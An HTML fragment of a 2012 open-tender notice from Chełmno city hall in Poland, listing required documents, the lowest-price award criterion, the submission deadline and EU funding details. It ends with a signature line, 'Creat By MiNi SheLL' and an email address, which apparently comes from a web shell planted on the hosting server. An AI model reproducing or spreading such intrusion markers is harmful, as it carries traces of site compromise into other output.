<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz oferty - wypełniony i podpisany przez Wykonawcę - Załącznik nr 2 do SIWZ;
2) oświadczenie o spełnianiu warunków niezbędnych przy ubieganiu się o udzielenie zamówienia publicznego na podstawie art. 22 ust. 1 pkt 1 - 4 ustawy P.z.p. (jeżeli oferta jest składana wspólnie przez kilka podmiotów, oświadczenie takie powinno być złożone, jako jedno i podpisane przez wszystkich partnerów lub ich pełnomocnika
3) pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeśli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.chelmno.pl/?app=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Chełmna
ul. Dworcowa 1 
86-200 Chełmno
lub otrzymać drogą elektroniczną zgłaszając takie zapotrzebowanie na adres: admfin.pokl@chelmno.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2012 godzina 13:00, miejsce: Urząd Miasta
ul. Dworcowa 1
86-200 Chełmno
Pokój nr 101 (Biuro informacji publicznej).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Skuteczne, przejrzyste i efektywne urzędy administracji samorządowej - współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego - Działanie 5.2.1 Modernizacja zarządzania w administracji samorządowej Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com